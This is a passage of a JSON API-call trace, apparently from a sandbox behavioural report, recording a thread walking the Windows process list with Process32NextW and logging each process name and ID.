"arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1044" + } + ], + "repeated": 0, + "id": 502 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2084" + } + ], + "repeated": 0, + "id": 503 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2132" + } + ], + "repeated": 0, + "id": 504 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "spoolsv.exe" + }, + { + "name": "ProcessId", + "value": "2208" + } + ], + "repeated": 0, + "id": 505 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2260" + } + ], + "repeated": 0, + "id": 506 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2320" + } + ], + "repeated": 0, + "id": 507 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2432" + } + ], + "repeated": 0, + "id": 508 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2468" + } + ], + "repeated": 0, + "id": 509 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2512" + } + ], + "repeated": 0, + "id": 510 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2544" + } + ], + "repeated": 0, + "id": 511 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2564" + } + ], + "repeated": 0, + "id": 512 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2580" + } + ], + "repeated": 0, + "id": 513 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2608" + } + ], + "repeated": 0, + "id": 514 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2732" + } + ], + "repeated": 0, + "id": 515 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2756" + } + ], + "repeated": 0, + "id": 516 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2772" + } + ], + "repeated": 0, + "id": 517 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MsMpEng.exe" + }, + { + "name": "ProcessId", + "value": "2780" + } + ], + "repeated": 0, + "id": 518 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2892" + } + ], + "repeated": 0, + "id": 519 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3004" + } + ], + "repeated": 0, + "id": 520 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3216" + } + ], + "repeated": 0, + "id": 521 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3544" + } + ], + "repeated": 0, + "id": 522 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sihost.exe" + }, + { + "name": "ProcessId", + "value": "3724" + } + ], + "repeated": 0, + "id": 523 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3740" + } + ], + "repeated": 0, + "id": 524 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3768" + } + ], + "repeated": 0, + "id": 525 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3868" + } + ], + "repeated": 0, + "id": 526 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "3888" + } + ], + "repeated": 0, + "id": 527 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3928" + } + ], + "repeated": 0, + "id": 528 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3940" + } + ], + "repeated": 0, + "id": 529 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4056" + } + ], + "repeated": 0, + "id": 530 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ctfmon.exe" + }, + { + "name": "ProcessId", + "value": "1564" + } + ], + "repeated": 0, + "id": 531 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4132" + } + ], + "repeated": 0, + "id": 532 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "explorer.exe" + }, + { + "name": "ProcessId", + "value": "4248" + } + ], + "repeated": 0, + "id": 533 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4372" + } + ], + "repeated": 0, + "id": 534 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4432" + } + ], + "repeated": 0, + "id": 535 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4812" + } + ], + "repeated": 0, + "id": 536 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4908" + } + ], + "repeated": 0, + "id": 537 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4936" + } + ], + "repeated": 0, + "id": 538 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "StartMenuExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "3508" + } + ], + "repeated": 0, + "id": 539 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4712" + } + ], + "repeated": 0, + "id": 540 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5144" + } + ], + "repeated": 0, + "id": 541 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchApp.exe" + }, + { + "name": "ProcessId", + "value": "5324" + } + ], + "repeated": 0, + "id": 542 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "5444" + } + ], + "repeated": 0, + "id": 543 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchIndexer.exe" + }, + { + "name": "ProcessId", + "value": "5456" + } + ], + "repeated": 0, + "id": 544 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5716" + } + ], + "repeated": 0, + "id": 545 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5876" + } + ], + "repeated": 0, + "id": 546 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smartscreen.exe" + }, + { + "name": "ProcessId", + "value": "6068" + } + ], + "repeated": 0, + "id": 547 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthSystray.exe" + }, + { + "name": "ProcessId", + "value": "6108" + } + ], + "repeated": 0, + "id": 548 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthService.exe" + }, + { + "name": "ProcessId", + "value": "5216" + } + ], + "repeated": 0, + "id": 549 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6468" + } + ], + "repeated": 0, + "id": 550 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7000" + } + ], + "repeated": 0, + "id": 551 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ApplicationFrameHost.exe" + }, + { + "name": "ProcessId", + "value": "7132" + } + ], + "repeated": 0, + "id": 552 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6384" + } + ], + "repeated": 0, + "id": 553 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7592" + } + ], + "repeated": 0, + "id": 554 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7620" + } + ], + "repeated": 0, + "id": 555 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "audiodg.exe" + }, + { + "name": "ProcessId", + "value": "7760" + } + ], + "repeated": 0, + "id": 556 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ShellExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "7964" + } + ], + "repeated": 0, + "id": 557 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8048" + } + ], + "repeated": 0, + "id": 558 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TextInputHost.exe" + }, + { + "name": "ProcessId", + "value": "7716" + } + ], + "repeated": 0, + "id": 559 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "812" + } + ], + "repeated": 0, + "id": 560 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WinStore.App.exe" + }, + { + "name": "ProcessId", + "value": "7444" + } + ], + "repeated": 0, + "id": 561 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4772" + } + ], + "repeated": 0, + "id": 562 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7408" + } + ], + "repeated": 0, + "id": 563 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "7736" + } + ], + "repeated": 0, + "id": 564 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6580" + } + ], + "repeated": 0, + "id": 565 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6536" + } + ], + "repeated": 0, + "id": 566 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchProtocolHost.exe" + }, + { + "name": "ProcessId", + "value": "2148" + } + ], + "repeated": 0, + "id": 567 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "1592" + } + ], + "repeated": 0, + "id": 568 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6316" + } + ], + "repeated": 0, + "id": 569 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SgrmBroker.exe" + }, + { + "name": "ProcessId", + "value": "3540" + } + ], + "repeated": 0, + "id": 570 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4160" + } + ], + "repeated": 0, + "id": 571 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6388" + } + ], + "repeated": 0, + "id": 572 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7140" + } + ], + "repeated": 0, + "id": 573 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msiexec.exe" + }, + { + "name": "ProcessId", + "value": "6840" + } + ], + "repeated": 0, + "id": 574 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7556" + } + ], + "repeated": 0, + "id": 575 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "364" + } + ], + "repeated": 0, + "id": 576 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "7904" + } + ], + "repeated": 0, + "id": 577 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1888" + } + ], + "repeated": 0, + "id": 578 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3788" + } + ], + "repeated": 0, + "id": 579 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1876" + } + ], + "repeated": 0, + "id": 580 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pyw.exe" + }, + { + "name": "ProcessId", + "value": "3876" + } + ], + "repeated": 0, + "id": 581 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pythonw.exe" + }, + { + "name": "ProcessId", + "value": "4696" + } + ], + "repeated": 0, + "id": 582 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + 